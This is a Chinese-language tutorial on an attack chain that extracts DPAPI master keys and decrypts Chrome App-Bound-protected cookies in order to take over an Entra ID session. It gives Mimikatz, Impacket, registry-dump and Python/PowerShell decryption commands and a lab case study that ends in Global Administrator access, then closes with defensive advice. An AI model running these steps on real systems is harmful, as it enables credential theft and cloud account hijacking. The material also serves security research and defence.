从DPAPI到Chrome：Entra ID接管完整攻击链路教学文档<\/h1>

概述<\/h2>
随着多因素认证(MFA)的广泛部署，从浏览器中窃取用户密码的利用价值降低，攻击者转向窃取浏览器Cookie作为突破口。现代浏览器如Chrome和Edge采用Windows内置的DPAPI数据保护机制加密敏感数据。本文将深入探索DPAPI概念和工作原理，演示完整攻击链路。<\/p>

第一章：DPAPI基础概念<\/h2>

1.1 什么是DPAPI<\/h3>

Data Protection API (DPAPI)<\/strong> 是Microsoft从Windows 2000开始提供的数据保护应用程序编程接口，用于向用户和系统进程提供操作系统级数据保护服务。<\/p>

核心特性：<\/strong><\/p>

解决加密系统中密钥管理的核心挑战<\/li>
使用用户或系统的机密信息作为熵源<\/li>
简化开发者加密工作，无需自行管理密钥保护<\/li> <\/ul>
1.2 DPAPI核心函数<\/h3>
\/\/ 主要加密解密函数 <\/span><\/span><\/span><\/span>CryptProtectData() \/\/ 数据加密 <\/span><\/span><\/span><\/span>CryptUnprotectData() \/\/ 数据解密 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 内存保护函数 <\/span><\/span><\/span><\/span>CryptProtectMemory() \/\/ 内存加密 <\/span><\/span><\/span><\/span>CryptUnprotectMemory() \/\/ 内存解密 <\/span><\/span><\/span><\/code><\/pre>Entropy参数：<\/strong> 加密解密时参与运算的额外密钥材料，增强安全性。<\/p> 第二章：攻击DPAPI的战略价值<\/h2> 2.1 现实攻击意义<\/h3> 战术优势：<\/strong><\/p> 绕过MFA多因素认证机制<\/li> 直接访问凭据管理器中的用户凭据<\/li> 解密浏览器保存的密码和Cookie<\/li> 实现云服务会话劫持<\/li> <\/ul> 2.2 攻击场景<\/h3> 典型攻击路径：<\/strong><\/p> 建立初始立足点<\/li> 提取DPAPI MasterKey<\/li> 解密敏感数据（凭据、Cookie）<\/li> 接管云服务会话（Microsoft 365、Azure AD\/Entra ID等）<\/li> <\/ol> 第三章：DPAPI技术深度解析<\/h2> 3.1 DPAPI核心组件<\/h3> 3.1.1 Secondary Entropy（二次熵）<\/h4> 应用程序提供的额外密钥材料<\/li> 增强同一用户下不同应用间的数据隔离<\/li> 必须与加密时相同的entropy值才能解密<\/li> <\/ul> 3.1.2 DPAPI Key体系<\/h4> MasterKey（主密钥）：<\/strong><\/p> 64字节随机数据<\/li> 基于用户密码保护<\/li> 每个MasterKey分配唯一GUID标识<\/li> 存储在用户配置文件目录<\/li> <\/ul> Session Key（会话密钥）：<\/strong><\/p> 基于MasterKey、随机数据和entropy生成<\/li> 实际用于数据加密的对称密钥<\/li> 不存储，使用时重新生成<\/li> <\/ul> 3.2 DPAPI层级结构<\/h3> 用户级别DPAPI Key<\/h4> 路径：%APPDATA%\Microsoft\Protect\<SID>\<\/code><\/li> 保护用户级别数据<\/li> 基于用户登录凭据派生<\/li> <\/ul> 机器\/系统级别DPAPI Key<\/h4> 路径：%WINDIR%\System32\Microsoft\Protect\S-1-5-18\User\<\/code><\/li> 保护系统级别数据<\/li> 基于DPAPI_SYSTEM密钥<\/li> <\/ul> 3.3 DPAPI Blob结构<\/h3> Data BLOB特征：<\/strong><\/p> 以01 00 00 00<\/code>开头<\/li> 包含保护数据的MasterKey GUID<\/li> 存储生成Session Key的随机数据<\/li> 支持过期MasterKey的解密<\/li> <\/ul> MasterKey过期机制：<\/strong><\/p> 硬编码3个月有效期<\/li> 过期后生成新MasterKey<\/li> 保留所有历史MasterKey用于解密旧数据<\/li> <\/ul> 3.4 DPAPI域备份机制<\/h3> 域备份密钥（Domain Backup Key）：<\/strong><\/p> 域控制器的公钥\/私钥对<\/li> 用于加密备份MasterKey<\/li> 通过安全RPC调用与域控制器通信<\/li> <\/ul> 备份恢复流程：<\/strong><\/p> DPAPI无法用用户密码解密时触发<\/li> 通过安全RPC发送备份MasterKey到域控制器<\/li> 域控制器用私钥解密后返回<\/li> <\/ol> 第四章：MasterKey提取技术<\/h2> 4.1 在线提取（不推荐）<\/h3> 使用Mimikatz提取：<\/strong><\/p> # 从LSASS内存提取所有已登录用户MasterKey<\/span> <\/span><\/span>mimikatz # dpapi::masterkey<\/span> <\/span><\/span><\/code><\/pre>局限性：<\/strong><\/p> 需要本地管理员权限<\/li> 可能触发杀软\/EDR检测<\/li> 需要工具上传到目标主机<\/li> <\/ul> 4.2 离线提取<\/h3> 4.2.1 使用用户密码\/凭据<\/h4> 已知用户密码和SID：<\/strong><\/p> # 使用Mimikatz解密<\/span> <\/span><\/span>mimikatz # dpapi::masterkey \/in:"MasterKey文件" \/password:用户密码 \/sid:用户SID<\/span> <\/span><\/span> <\/span><\/span># 使用域用户密码哈希<\/span> <\/span><\/span>mimikatz # dpapi::masterkey \/in:"MasterKey文件" \/rpc \/password:密码哈希<\/span> <\/span><\/span> <\/span><\/span># 使用Impacket的dpapi.py<\/span> <\/span><\/span>python dpapi.py masterkey -file 主密钥文件 -password 用户密码 -sid 用户SID <\/span><\/span><\/code><\/pre>4.2.2 使用域备份密钥<\/h4> 从域控制器转储域备份密钥：<\/strong><\/p> # 使用Mimikatz转储<\/span> <\/span><\/span>mimikatz # lsadump::backupkeys \/system:域控制器IP \/export<\/span> <\/span><\/span> <\/span><\/span># 生成的密钥文件：<\/span> <\/span><\/span># - *.pvk文件（私钥文件，最重要）<\/span> <\/span><\/span># - 其他相关文件<\/span> <\/span><\/span><\/code><\/pre>使用域备份密钥恢复MasterKey：<\/strong><\/p> # 使用Mimikatz恢复<\/span> <\/span><\/span>mimikatz # dpapi::masterkey \/in:"MasterKey文件" \/pvk:域备份密钥.pvk<\/span> <\/span><\/span> <\/span><\/span># 使用Impacket恢复 <\/span> <\/span><\/span>python dpapi.py masterkey -file 主密钥文件 -pvk 域备份密钥.pvk <\/span><\/span><\/code><\/pre>第五章：解密DPAPI保护的数据<\/h2> 5.1 解密凭据管理器Vault<\/h3> 凭据文件位置：<\/strong><\/p> %USERPROFILE%\AppData\Local\Microsoft\Credentials\<\/code><\/li> 系统文件属性，需特殊命令查看<\/li> <\/ul> 解密流程：<\/strong><\/p> 拷贝凭据文件到本地<\/li> 解析凭据文件获取保护的MasterKey GUID<\/li> 使用对应MasterKey解密凭据<\/li> <\/ol> # 解析凭据文件<\/span> <\/span><\/span>mimikatz # dpapi::cred \/in:凭据文件<\/span> <\/span><\/span> <\/span><\/span># 使用MasterKey解密<\/span> <\/span><\/span>mimikatz # dpapi::cred \/in:凭据文件 \/masterkey:MasterKey值<\/span> <\/span><\/span><\/code><\/pre>5.2 解密浏览器Cookie（传统方案）<\/h3> Chrome 127版本之前：<\/strong><\/p> 文件位置：<\/strong><\/p> Cookies数据库：%LocalAppData%\Google\Chrome\User Data\Default\Network\Cookies<\/code><\/li> 加密密钥：%LocalAppData%\Google\Chrome\User Data\Local State<\/code><\/li> <\/ul> 解密流程：<\/strong><\/p> 定位Cookies和Local State文件<\/li> 从Local State读取os_crypt.encrypted_key<\/code>字段<\/li> Base64解码得到DPAPI保护的Data BLOB<\/li> 解密BLOB得到AES加密密钥<\/li> 使用AES密钥解密Cookies数据库<\/li> <\/ol> 第六章：Chrome App-Bound加密保护突破<\/h2> 6.1 App-Bound保护机制<\/h3> 保护特性：<\/strong><\/p> Chrome 127+版本引入v20标识<\/li> 应用身份绑定加密（类似macOS Keychain）<\/li> 特权服务验证应用身份<\/li> 需要系统权限或Chrome进程注入才能解密<\/li> <\/ul> 6.2 加密保护演进<\/h3> 版本演进：<\/strong><\/p> Chrome 133之前<\/strong>：AES-256-GCM，密钥硬编码在elevation_service.exe<\/li> Chrome 133-136<\/strong>：ChaCha20_Poly1305，密钥硬编码<\/li> Chrome 137+<\/strong>：AES-256-GCM，随机aes_key + CNG加密保护<\/li> <\/ul> 6.3 最新保护机制解密流程<\/h3> 6.3.1 三层保护结构<\/h4> 第一层<\/strong>：对"App-Bound Key"进行加密保护<\/li> 第二层<\/strong>：使用用户MasterKey进行DPAPI保护<\/li> 第三层<\/strong>：使用系统MasterKey进行DPAPI保护<\/li> <\/ol> 6.3.2 详细解密步骤<\/h4> 步骤1：文件准备<\/strong><\/p> # 提取app_bound_encrypted_key的Python脚本<\/span> <\/span><\/span>import<\/span> json <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>with<\/span> open('Local State'<\/span>, 'r'<\/span>, encoding=<\/span>'utf-8'<\/span>) as<\/span> f: <\/span><\/span> local_state =<\/span> json.<\/span>load(f) <\/span><\/span> <\/span><\/span>encrypted_key =<\/span> local_state['os_crypt'<\/span>]['app_bound_encrypted_key'<\/span>] <\/span><\/span>encrypted_bytes =<\/span> base64.<\/span>b64decode(encrypted_key) <\/span><\/span> <\/span><\/span>with<\/span> open('app_bound_encrypted_key.bin'<\/span>, 'wb'<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(encrypted_bytes) <\/span><\/span><\/code><\/pre>步骤2：解析Data BLOB<\/strong><\/p> # 使用Mimikatz解析保护的系统MasterKey GUID<\/span> <\/span><\/span>mimikatz # dpapi::blob \/in:app_bound_encrypted_key.bin<\/span> <\/span><\/span><\/code><\/pre>步骤3：获取DPAPI_SYSTEM密钥<\/strong><\/p> # 转储注册表获取DPAPI_SYSTEM<\/span> <\/span><\/span>reg save HKLM\S<\/span>YSTEM SYSTEM.hiv <\/span><\/span>reg save HKLM\S<\/span>ECURITY SECURITY.hiv <\/span><\/span> <\/span><\/span># 使用Mimikatz解析<\/span> <\/span><\/span>mimikatz # lsadump::secrets \/system:SYSTEM.hiv \/security:SECURITY.hiv<\/span> <\/span><\/span><\/code><\/pre>步骤4：解密系统MasterKey<\/strong><\/p> # 找到对应GUID的MasterKey文件并解密<\/span> <\/span><\/span>mimikatz # dpapi::masterkey \/in:系统MasterKey文件 \/system:DPAPI_SYSTEM值<\/span> <\/span><\/span><\/code><\/pre>步骤5：第一层解密<\/strong><\/p> # 使用系统MasterKey解密Data BLOB<\/span> <\/span><\/span>mimikatz # dpapi::blob \/in:app_bound_encrypted_key.bin \/masterkey:系统MasterKey值<\/span> <\/span><\/span><\/code><\/pre>步骤6：第二层解密<\/strong><\/p> # 使用用户MasterKey解密中间结果<\/span> <\/span><\/span>mimikatz # dpapi::blob \/in:decrypted_blob_1.bin \/masterkey:用户MasterKey值<\/span> <\/span><\/span><\/code><\/pre>步骤7：解析加密结构<\/strong><\/p> 解密后的Hexdump结构：<\/p> 00 00 00 03<\/code>标记：指示加密方案（03=AES-256-GCM + CNG）<\/li> ENCRYPTED_AES_KEY<\/strong>（32字节）：经过XOR混淆和CNG加密的aes_key<\/li> IV<\/strong>（12字节）：AES-256-GCM初始化向量<\/li> CIPHERTEXT<\/strong>（32字节）：加密的App-Bound Key<\/li> TAG<\/strong>（16字节）：GCM认证标签<\/li> <\/ul> 加密方案标记：<\/strong><\/p> 00 00 00 01<\/code>：AES-256-GCM，硬编码密钥<\/li> 00 00 00 02<\/code>：ChaCha20_Poly1305，硬编码密钥<\/li> 00 00 00 03<\/code>：AES-256-GCM，随机aes_key + CNG保护<\/li> <\/ul> 步骤8：CNG解密aes_key<\/strong><\/p> # Decrypt-ChromeCngEncryptedAesKey.ps1<\/span> <\/span><\/span># 模拟LSASS进程令牌调用CNG API解密<\/span> <\/span><\/span>Add-Type -AssemblyName System.Security <\/span><\/span> <\/span><\/span># CNG解密逻辑<\/span> <\/span><\/span>$encryptedAesKey = [byte[]]<\/span>@(0x12, 0x34, 0x56, ...) # 替换为实际的ENCRYPTED_AES_KEY<\/span> <\/span><\/span>$decryptedAesKey = Invoke-CngDecryption -EncryptedData $encryptedAesKey <\/span><\/span> <\/span><\/span># XOR运算得到明文aes_key<\/span> <\/span><\/span>$staticConstant = [byte[]]<\/span>@(0x01, 0x02, 0x03, ...) # elevation_service.exe中的硬编码常量<\/span> <\/span><\/span>$aesKeyPlaintext = $decryptedAesKey | ForEach-Object { $_ -bxor<\/span> $staticConstant[$i++] } <\/span><\/span><\/code><\/pre>步骤9：最终解密App-Bound Key<\/strong><\/p> # 使用aes_key解密CIPHERTEXT得到真正的Cookie解密密钥<\/span> <\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>def<\/span> decrypt_app_bound_key<\/span>(encrypted_aes_key, iv, ciphertext, tag, aes_key): <\/span><\/span> cipher =<\/span> AES.<\/span>new(aes_key, AES.<\/span>MODE_GCM, nonce=<\/span>iv) <\/span><\/span> plaintext =<\/span> cipher.<\/span>decrypt_and_verify(ciphertext, tag) <\/span><\/span> return<\/span> plaintext <\/span><\/span> <\/span><\/span># 解密Cookies数据库<\/span> <\/span><\/span>app_bound_key =<\/span> decrypt_app_bound_key(encrypted_aes_key, iv, ciphertext, tag, aes_key_plaintext) <\/span><\/span><\/code><\/pre>第七章：实战案例研究<\/h2> 7.1 攻击场景设定<\/h3> 环境条件：<\/strong><\/p> 实验室：OffsecLabs<\/li> 已控制域控制器并转储域备份密钥<\/li> 目标用户：offseclabs\david.lewis<\/li> 目标主机：ITWS-DLEWIS<\/li> Chrome版本：140.0.7339.208（启用App-Bound保护）<\/li> <\/ul> 7.2 操作步骤验证<\/h3> 步骤1：文件收集<\/h4> 拷贝目标用户的Cookies和Local State文件<\/li> 确认Chrome版本和加密机制<\/li> <\/ul> 步骤2-6：MasterKey解密链<\/h4> 按前述流程完成三层解密<\/li> 验证每个步骤的解密结果<\/li> <\/ul> 步骤7-9：App-Bound Key最终解密<\/h4> 成功获取aes_key明文<\/li> 解密得到真正的Cookie解密密钥<\/li> <\/ul> 7.3 会话接管<\/h3> 关键认证Cookie：<\/strong><\/p> ESTSAUTH<\/code>：会话认证Cookie<\/li> ESTSAUTHPERSISTENT<\/code>：持久认证Cookie<\/li> ESTSAUTHLIGHT<\/code>：轻量级认证Cookie<\/li> <\/ul> 接管流程：<\/strong><\/p> 解密获取认证Cookie值<\/li> 访问login.microsoftonline.com<\/li> 注入认证Cookie恢复会话<\/li> 以Global Administrator身份访问Entra ID<\/li> <\/ol> 第八章：防御建议<\/h2> 8.1 技术防护措施<\/h3> 强化DPAPI保护：<\/strong><\/p> 启用Credential Guard<\/li> 限制DPAPI_SYSTEM访问权限<\/li> 监控异常DPAPI调用<\/li> <\/ul> 浏览器安全加固：<\/strong><\/p> 定期清理浏览器Cookie<\/li> 启用浏览器安全增强功能<\/li> 限制浏览器扩展权限<\/li> <\/ul> 8.2 检测与监控<\/h3> 关键检测指标：<\/strong><\/p> 异常LSASS内存访问<\/li> 可疑的DPAPI相关注册表操作<\/li> 浏览器进程异常行为<\/li> 域控制器备份密钥访问日志<\/li> <\/ul> 8.3 组织安全策略<\/h3> 权限管理：<\/strong><\/p> 实施最小权限原则<\/li> 定期轮换域备份密钥<\/li> 加强域控制器安全防护<\/li> <\/ul> 安全意识：<\/strong><\/p> 培训用户安全浏览习惯<\/li> 建立安全事件响应流程<\/li> <\/ul> 附录：工具和资源<\/h2> 主要工具<\/h3> Mimikatz<\/strong>：DPAPI相关操作<\/li> Impacket dpapi.py<\/strong>：Python实现的DPAPI工具<\/li> 自定义脚本<\/strong>：CNG解密、Cookie解密等<\/li> <\/ul> 参考资源<\/h3> Microsoft官方DPAPI文档<\/li> Chrome安全白皮书<\/li> 相关研究论文和博客文章<\/li> <\/ul> 本教学文档详细阐述了从DPAPI基础到Chrome App-Bound保护突破的完整攻击链路，为安全研究人员提供深入的技术参考，同时帮助企业更好地防御此类高级攻击。<\/em><\/p>